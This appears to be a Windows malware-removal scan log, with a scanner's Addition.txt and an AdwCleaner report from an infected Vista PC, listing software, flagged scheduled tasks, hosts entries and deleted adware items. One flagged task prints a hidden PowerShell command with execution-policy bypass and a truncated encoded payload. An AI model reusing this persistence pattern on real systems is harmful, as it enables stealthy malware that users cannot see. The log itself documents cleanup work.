CyberLink Power2Go (HKLM\...\{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 5.5.4316 - CyberLink Corp.)
D3DX10 (HKLM\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
Gateway Games (HKLM\...\WildTangent gateway Master Uninstall) (Version: 1.0.0.71 - WildTangent)
Gateway Recovery Management (HKLM\...\{7F811A54-5A09-4579-90E1-C93498E230D9}) (Version: 3.1.3003 - Acer Incorporated)
IDT Audio (HKLM\...\{07D8511D-C9FE-4A93-933F-EAA5C8F20095}) (Version: 5.10.5303.0 - IDT)
Illustrated Guide to Veterinary Medical Terminology, 3e (HKLM\...\Illustrated Guide to Veterinary Medical Terminology, 3e_is1) (Version: - Cengage Delmar Learning)
ImTOO DVD Creator (HKLM\...\ImTOO DVD Creator) (Version: 3.0.45.1127 - ImTOO)
Intel(R) Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version: - Intel Corporation)
Magic DVD Copier Version 5.0.1 (HKLM\...\Magic DVD Copier_is1) (Version: - Magic DVD Software, Inc.)
Malwarebytes version 3.5.1.2522 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.5.1.2522 - Malwarebytes)
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version: - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version: - Microsoft)
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Home and Student 2007 (HKLM\...\HOMESTUDENTR) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office PowerPoint Viewer 2007 (English) (HKLM\...\{95120000-00AF-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Suite Activation Assistant (HKLM\...\{E50AE784-FABE-46DA-A1F8-7B6B56DCB22E}) (Version: 2.9 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40728.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Web Publishing Wizard 1.52 (HKLM\...\WebPost) (Version: - )
Microsoft Works (HKLM\...\{67E03279-F703-408F-B4BF-46B5FC8D70CD}) (Version: 9.7.0621 - Microsoft Corporation)
MSXML 4.0 SP2 (KB927978) (HKLM\...\{37477865-A3F1-4772-AD43-AAFC6BCFF99F}) (Version: 4.20.9841.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
NETGEAR WNA1000M Wireless USB 2.0 Adapter (HKLM\...\{62F7B391-E2B2-4714-BBAA-A14E4FAAB95C}) (Version: 1.01.10 - NETGEAR) Hidden
NETGEAR WNA1000M Wireless USB 2.0 Adapter (HKLM\...\InstallShield_{62F7B391-E2B2-4714-BBAA-A14E4FAAB95C}) (Version: 1.01.10 - NETGEAR)
OGA Notifier 2.0.0048.0 (HKLM\...\{B2544A03-10D0-4E5E-BA69-0362FFC20D18}) (Version: 2.0.0048.0 - Microsoft Corporation) Hidden
Realtek 8169, 8168, 8101E and 8102E Ethernet Network Card Driver for Windows Vista (HKLM\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 1.00.0000 - Realtek)
Realtek USB 2.0 Card Reader (HKLM\...\{DC24971E-1946-445D-8A82-CE685433FA7D}) (Version: - Realtek Semiconductor Corp.)
Segoe UI (HKLM\...\{5DD4FCBD-A3C1-4155-9E17-4161C70AAABA}) (Version: 15.4.2271.0615 - Microsoft Corp) Hidden
Setup (HKLM\...\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC}) (Version: - ) <==== ATTENTION
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 9.1.3.0 - Synaptics)
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft)
Windows Live Essentials (HKLM\...\WinLiveSuite) (Version: 15.4.3502.0922 - Microsoft Corporation)
Windows Live Sync (HKLM\...\{A1BF9950-8CDB-468E-83FA-EACFB00EA7D5}) (Version: 14.0.8064.206 - Microsoft Corporation)
WLTB Custom Buttons (HKLM\...\{C6522325-92ED-4312-A45A-04E45896C130}) (Version: 1.0.0 - Microsoft)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-05-09] (Malwarebytes)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2008-09-01] (Intel Corporation)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-05-09] (Malwarebytes)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {00FF43E5-657C-4B78-B399-7ACBEF0A3292} - System32\Tasks\Seventh => C:\Users\Angela\AppData\Roaming\Seventh\Seventh.exe <==== ATTENTION
Task: {022DEE05-561E-4CA8-9E66-5E15E40FA6C9} - System32\Tasks\DNSTANNERSVILLE => dnstannersville.exe <==== ATTENTION
Task: {033CCE13-BDD9-4CB1-9DA7-D727FDDC0E42} - System32\Tasks\avayvaxvaa => C:\Users\Angela\AppData\Local\avayvaxvaa\avayvaxvaa.exe [2015-02-19] () <==== ATTENTION
Task: {2C48990D-9649-4BD7-8E9F-DD99174E6408} - System32\Tasks\Genius_Interval => C:\Users\Angela\AppData\Roaming\Genius\Genius.exe
Task: {38F1B313-1F9E-486F-81E2-B88C8BA48973} - System32\Tasks\Genius => C:\Users\Angela\AppData\Roaming\Genius\Genius.exe <==== ATTENTION
Task: {4A7287A7-CBDE-4977-BBA9-40E905E65DC6} - System32\Tasks\UOEJSMCMOGWSTARU => C:\ProgramData\Service1291\Service1291.exe <==== ATTENTION
Task: {7473E943-FB5B-440C-9CD4-744ADF747E12} - System32\Tasks\Xoiihrsematu => C:\ProgramData\Xoiihrsematu\1.0.7.1\boofssix.exe
Task: {A241D5E1-D344-4097-8319-D5932BEE465A} - System32\Tasks\{05040C47-0805-0C05-0B11-0B0E05041109} => C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (the data entry has 9364 more characters). <==== ATTENTION
Task: {B35A6A11-D772-4D2D-B6D3-7664D58A3EE5} - System32\Tasks\One System Care Task => C:\PROGRA~1\ONESYS~1\SYSTEM~1.EXE <==== ATTENTION
Task: {B643A498-2E30-4C67-B841-A7AEDD004C4B} - System32\Tasks\Sixth => C:\Users\Angela\AppData\Roaming\Sixth\Sixth.exe <==== ATTENTION
Task: {DC5A0A70-9FE1-4847-8DC5-34F54A2B5E3B} - System32\Tasks\System Healer Task => C:\PROGRA~1\SYSTEM~1\RESCUE~1.EXE <==== ATTENTION

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\UOEJSMCMOGWSTARU.job => C:\ProgramData\Service1291\Service1291.exe <==== ATTENTION
Task: C:\Windows\Tasks\{05040C47-0805-0C05-0B11-0B0E05041109}.job => powershell exe
Task: C:\Windows\Tasks\{080A7E47-0B08-0B0F-0411-0A047D0E1178}.job => powershell exe

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)


==================== Loaded Modules (Whitelisted) ==============

2015-08-24 10:03 - 2015-08-24 10:03 - 000482816 _____ () C:\Program Files\74697254-1425516543-2D2D-2D2D-0003254135CB\knsj6E67.tmp
2009-03-11 22:48 - 2008-06-11 12:18 - 000024576 _____ () C:\Program Files\GATEWAY\Gateway Recovery Management\Service\ETService.exe
2009-03-11 22:48 - 2009-03-11 22:48 - 000032768 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Model.Controller\3.0.3009.0__14bcaafdb44b5951\Framework.Model.Controller.dll
2009-03-11 22:48 - 2009-03-11 22:48 - 000009216 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Model.ControllerInterface\3.0.3009.0__d842b71b4d6ed079\Framework.Model.ControllerInterface.dll
2009-03-11 22:48 - 2009-03-11 22:48 - 000061440 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Library\3.0.3009.0__3036420f80dd6947\Framework.Library.dll
2009-03-11 22:48 - 2009-03-11 22:48 - 000015360 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Host\3.0.3009.0__672b450de5a7e94a\Framework.Host.dll
2009-03-11 22:48 - 2009-03-11 22:48 - 000006144 _____ () C:\Windows\assembly\GAC_MSIL\Framework.PluginInterface\3.0.3009.0__9ecdf03bb2054f94\Framework.PluginInterface.dll
2009-03-11 22:48 - 2009-03-11 22:48 - 000036864 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Utility\3.0.3009.0__4df5dcab8860d239\Framework.Utility.dll
2015-03-04 18:49 - 2015-03-04 18:49 - 000193536 _____ () C:\Users\Angela\AppData\Roaming\74697254-1425516543-2D2D-2D2D-0003254135CB\jnsqBF1A.tmp
2011-01-27 15:13 - 2011-01-27 15:13 - 000226624 _____ () C:\Program Files\Motorola\MotoHelper\MotoHelperService.exe
2011-06-30 22:23 - 2011-06-30 22:23 - 000167936 _____ () C:\Program Files\NETGEAR\WNA1000M\WlanWpsSvc.exe
2011-01-27 15:13 - 2011-01-27 15:13 - 000673088 _____ () C:\Program Files\Motorola\MotoHelper\MotoHelperAgent.exe

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:7631EA83 [118]
AlternateDataStreams: C:\ProgramData\TEMP:9AB56A06 [122]
AlternateDataStreams: C:\ProgramData\TEMP:C46995DA [286]

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" value will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2006-11-02 04:23 - 2007-03-20 02:16 - 000000904 ____N C:\Windows\system32\Drivers\etc\hosts

127.0.0.1 localhost
127.0.0.1 down.baidu2016.com
127.0.0.1 123.sogou.com
127.0.0.1 www.czzsyzgm.com
127.0.0.1 www.czzsyzxl.com

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-2860630475-1531993715-2310474269-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Angela\AppData\Roaming\Microsoft\Windows Photo Gallery\Windows Photo Gallery Wallpaper.jpg
DNS Servers: 75.75.75.75 - 75.75.76.76
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 2) (ConsentPromptBehaviorUser: 1) (EnableLUA: 0)
Windows Firewall is disabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

If an entry is included in the fixlist, it will be removed.

MSCONFIG\Services: sprtsvc_quickcare => 2
MSCONFIG\Services: SupportSoft RemoteAssist => 3
MSCONFIG\Services: tgsrvc_quickcare => 2
MSCONFIG\Services: wbsvc => 2

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [WinCollab-Out-UDP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-In-UDP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-Out-TCP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-In-TCP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-DFSR-Out-TCP] => (Allow) %SystemRoot%\system32\dfsr.exe
FirewallRules: [WinCollab-DFSR-In-TCP] => (Allow) %SystemRoot%\system32\dfsr.exe

==================== Restore Points =========================

30-10-2018 23:39:08 Removed Itibiti RTC

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================

System errors:
=============
Error: (03/20/2007 12:26:02 AM) (Source: W32Time) (EventID: 34) (User: )
Description: The time service has detected that the system time needs to be changed by +366631237 seconds. The time service will not change the system time by more than +54000 seconds. Verify that your time and time zone are correct, and that the time source time.windows.com,0x9 (ntp.m|0x9|0.0.0.0:123->13.65.245.138:123) is working properly.


CodeIntegrity:
===================================

Date: 2007-03-20 01:04:16.776
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\SYMEVENT.SYS because the set of per-page image hashes could not be found on the system.

Date: 2007-03-20 01:04:15.903
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\SYMEVENT.SYS because the set of per-page image hashes could not be found on the system.

Date: 2007-03-20 01:04:15.060
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\SYMEVENT.SYS because the set of per-page image hashes could not be found on the system.

Date: 2007-03-20 01:04:14.202
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\SYMEVENT.SYS because the set of per-page image hashes could not be found on the system.

Date: 2007-03-20 01:03:23.221
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\SYMEVENT.SYS because the set of per-page image hashes could not be found on the system.

Date: 2007-03-20 01:03:22.239
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\SYMEVENT.SYS because the set of per-page image hashes could not be found on the system.

Date: 2007-03-20 01:03:21.381
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\SYMEVENT.SYS because the set of per-page image hashes could not be found on the system.

Date: 2007-03-20 01:03:20.460
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\SYMEVENT.SYS because the set of per-page image hashes could not be found on the system.

==================== Memory info ===========================

Processor: Intel(R) Pentium(R) Dual CPU T3400 @ 2.16GHz
Percentage of memory in use: 51%
Total physical RAM: 2037.69 MB
Available physical RAM: 981.96 MB
Total Virtual: 4314.66 MB
Available Virtual: 3269.61 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:222.88 GB) (Free:162.68 GB) NTFS ==>[drive with boot components (obtained from BCD)]

\\?\Volume{b27fdb1c-0ebe-11de-9864-806e6f6e6963}\ (PQSERVICE) (Fixed) (Total:10 GB) (Free:3.18 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 232.9 GB) (Disk ID: 88A5A4A5)
Partition 1: (Not Active) - (Size=10 GB) - (Type=27)
Partition 2: (Active) - (Size=222.9 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================

# -------------------------------
# Malwarebytes AdwCleaner 7.2.4.0
# -------------------------------
# Build: 09-25-2018
# Database: 2018-09-21.1 (Local)
# Support: Customer Support & Help Center
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start: 03-20-2007
# Duration: 00:00:13
# OS: Windows Vista (TM) Home Premium
# Cleaned: 144
# Failed: 23


***** [ Services ] *****

No malicious services cleaned.

***** [ Folders ] *****

Deleted C:\Program Files\SearchProtect
Deleted C:\ProgramData\SERVICE1291
Deleted C:\ProgramData\CA85ED86-4687-1
Deleted C:\ProgramData\CA85ED86-3FD5-1
Deleted C:\ProgramData\CA85ED86-30A1-0
Deleted C:\ProgramData\C6B12A7F-37B5-0
Deleted C:\ProgramData\C6B12A7F-08A7-1
Deleted C:\ProgramData\C6B12A7F-0753-1
Deleted C:\ProgramData\LolliScan
Deleted C:\Users\Angela\AppData\LocalLow\FunWebProducts
Deleted C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GAMESDESKTOP
Deleted C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Pogo Games
Deleted C:\Users\Angela\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pogo Games
Deleted C:\Program Files\QualityChecker
Deleted C:\Users\Angela\AppData\Roaming\FunFeedr
Deleted C:\Users\Angela\AppData\Roaming\Sixth
Deleted C:\Users\Angela\AppData\Roaming\Seventh
Deleted C:\Users\Angela\AppData\Roaming\Common\LuaRT
Deleted C:\Users\Angela\AppData\Local\avayvaxvaa
Deleted C:\Program Files\WSE_Binkiland
Deleted C:\Windows\System32\config\systemprofile\AppData\Local\WebBar
Deleted C:\Program Files\predm
Deleted C:\Program Files\globalUpdate
Deleted C:\Users\Angela\AppData\Local\globalUpdate
Deleted C:\Windows\Quicky Translator
Deleted C:\Users\Angela\AppData\Roaming\Systweak
Deleted C:\Users\Angela\AppData\LocalLow\COMPANY\PRODUCT
Deleted C:\Windows\System32\config\systemprofile\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}
Deleted C:\Users\Angela\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}
Deleted C:\Program Files\SHOPPERZ
Deleted C:\Program Files\GMSD_US_005010200
Deleted C:\Program Files\GMSD_US_005010199
Deleted C:\Program Files\GMSD_US_005010193

***** [ Files ] *****

Deleted C:\Windows\System32\drivers\{A55667F1-A319-4629-A8B6-A68D9D3313EE}GT.SYS
Deleted C:\Windows\System32\roboot.exe
Deleted C:\END
Deleted C:\Windows\System32\drivers\sp_rsdrv2.sys
Deleted C:\Windows\System32\drivers\SPPD.sys
Deleted C:\Windows\AppPatch\Custom\{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb
Deleted C:\Windows\System32\BasementDusterOff.ini

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

Deleted C:\Windows\Tasks\{080A7E47-0B08-0B0F-0411-0A047D0E1178}.job
Deleted C:\Windows\Tasks\{05040C47-0805-0C05-0B11-0B0E05041109}.job
Deleted C:\Windows\Tasks\UOEJSMCMOGWSTARU.job
Deleted C:\Windows\System32\Tasks\{05040C47-0805-0C05-0B11-0B0E05041109}
Deleted C:\Windows\System32\Tasks\UOEJSMCMOGWSTARU
Deleted C:\Windows\System32\Tasks\DNSTANNERSVILLE
Deleted C:\Windows\System32\Tasks\Genius_Interval
Deleted C:\Windows\System32\Tasks\avayvaxvaa
Deleted C:\Windows\System32\Tasks\One System Care Task
Deleted C:\Windows\System32\Tasks\System Healer Task
Deleted C:\Windows\System32\Tasks\Sixth
Deleted C:\Windows\System32\Tasks\Seventh
Deleted C:\Windows\System32\Tasks\Genius

***** [ Registry ] *****

Deleted HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\11598763487076930564
Deleted HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\SearchProtect
Not Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{05040C47-0805-0C05-0B11-0B0E05041109}
Not Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\UOEJSMCMOGWSTARU
Not Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{022DEE05-561E-4CA8-9E66-5E15E40FA6C9}
Not Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{022DEE05-561E-4CA8-9E66-5E15E40FA6C9}
Not Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\DNSTANNERSVILLE
Deleted HKLM\Software\Classes\Interface\{FC073BDA-C115-4A1D-9DF9-9B5C461482E5}
Deleted HKLM\Software\Classes\Interface\{4E6354DE-9115-4AEE-BD21-C46C3E8A49DB}
Deleted HKLM\Software\Classes\TypeLib\{A2D733A7-73B0-4C6B-B0C7-06A432950B66}
Deleted HKLM\Software\Classes\AppID\{A5BBB804-8009-4246-BED3-2D3335981EF6}
Deleted HKLM\Software\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
Deleted HKCU\Software\Reg\Clean
Deleted HKLM\Software\Reg\Clean
Deleted HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\Consumer Input Installer
Deleted HKLM\Software\CompeteInc
Deleted HKCU\Software\AppDataLow\Software\{3BDFD1D7-7A9B-4D29-80B3-D00E66E62885}
Deleted HKCU\Software\{3BDFD1D7-7A9B-4D29-80B3-D00E66E62885}
Deleted HKLM\Software\{3BDFD1D7-7A9B-4D29-80B3-D00E66E62885}
Deleted HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\FlashBeat
Deleted HKCU\Software\AppDataLow\Software\Crossrider
Deleted HKLM\Software\AppDataLow\Software\Crossrider
Deleted HKU\S-1-5-18\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\_CrossriderRegNamePlaceHolder_
Deleted HKU\.DEFAULT\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\_CrossriderRegNamePlaceHolder_
Deleted HKU\S-1-5-18\Software\AppDataLow\Software\_CrossriderRegNamePlaceHolder_
Deleted HKU\.DEFAULT\Software\AppDataLow\Software\_CrossriderRegNamePlaceHolder_
Deleted HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\26D9E607FFF0C58C7844B47FF8B6E079E5A2220E
Deleted HKCU\Software\AppDataLow\Software\DynConIE
Deleted HKCU\Software\AppDataLow\Sams.Browser
Deleted HKCU\Software\FunFeedr
Deleted HKCU\Software\AppDataLow\Software\FunWebProducts
Deleted HKLM\Software\GAMESDESKTOP
Not Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2C48990D-9649-4BD7-8E9F-DD99174E6408}
Not Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2C48990D-9649-4BD7-8E9F-DD99174E6408}
Not Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Genius_Interval
Deleted HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\SpaceSoundPro
Deleted HKCU\Software\SpaceSoundPro
Deleted HKCU\Software\CoinisRS
Deleted HKCU\Software\FFUPD
Deleted HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\SU
Deleted HKCU\Software\YahooPartnerToolbar
Deleted HKCU\Software\powerpack
Deleted HKCU\Software\GlobalUpdate
Deleted HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\{86D4B82A-ABED-442A-BE86-96357B70F4FE}
Deleted HKLM\Software\WebBar
Deleted HKCU\Software\WSE_Binkiland
Deleted HKLM\Software\SPPDCOM
Deleted HKCU\Software\QualityChecker
Deleted HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\software_reporter_tool.exe|{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb
Deleted HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\software_removal_tool.exe|{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb
Deleted HKLM\SOFTWARE\MICROSOFT\Windows NT\CurrentVersion\AppCompatFlags\Custom\iexplore.exe|{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb
Deleted HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\firefox.exe|{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb
Deleted HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\chrome.exe|{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb
Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\SetupDataMngr_iMesh.exe
Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\SetupDataMngr_iLivid.exe
Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\SearchProtectionStub.exe
Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\SearchProtectionSetup.exe
Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\Layers\VC32Ldr
Deleted HKLM\Software\Classes\CLSID\{8FF10FED-2F0A-4F7F-BE87-B04F1DCD4319}
Deleted HKLM\Software\Classes\AppID\{4AC9981D-592D-4044-8C0A-8F6FE843D683}
Deleted HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser|{21FA44EF-376D-4D53-9B0F-8A89D3229068}
Deleted HKLM\Software\Classes\CLSID\{F83D1872-D9FF-47F8-B5A0-49CC51E24EE8}
Deleted HKLM\Software\Classes\AppID\{425F4ABF-B8E4-402D-9E49-06E494EB8DBF}
Deleted HKLM\Software\Classes\TypeLib\{B5C4833B-847B-49CD-8EBE-CDD9B43C882F}
Deleted HKLM\Software\Classes\TypeLib\{14EF423E-3EE8-44AE-9337-07AC3F27B744}
Deleted HKLM\Software\Classes\Interface\{EE0D8859-2ED4-4B0D-9812-16865B9AFD65}
Deleted HKLM\Software\Classes\Interface\{A9582D7B-F24A-441D-9D26-450D58F3CD17}
Deleted HKLM\Software\Classes\CLSID\{E5A7A645-8318-4895-B85C-EDC606B80DB6}
Deleted HKLM\Software\Classes\CLSID\{459DD0F7-0D55-D3DC-67BC-E6BE37E9D762}
Deleted HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser|{D4027C7F-154A-4066-A1AD-4243D8127440}
Not Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{033CCE13-BDD9-4CB1-9DA7-D727FDDC0E42}
Not Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{033CCE13-BDD9-4CB1-9DA7-D727FDDC0E42}
Not Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\avayvaxvaa
Not Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B35A6A11-D772-4D2D-B6D3-7664D58A3EE5}
Not Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B35A6A11-D772-4D2D-B6D3-7664D58A3EE5}
Not Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\One System Care Task
Not Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{DC5A0A70-9FE1-4847-8DC5-34F54A2B5E3B}
Not Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DC5A0A70-9FE1-4847-8DC5-34F54A2B5E3B}
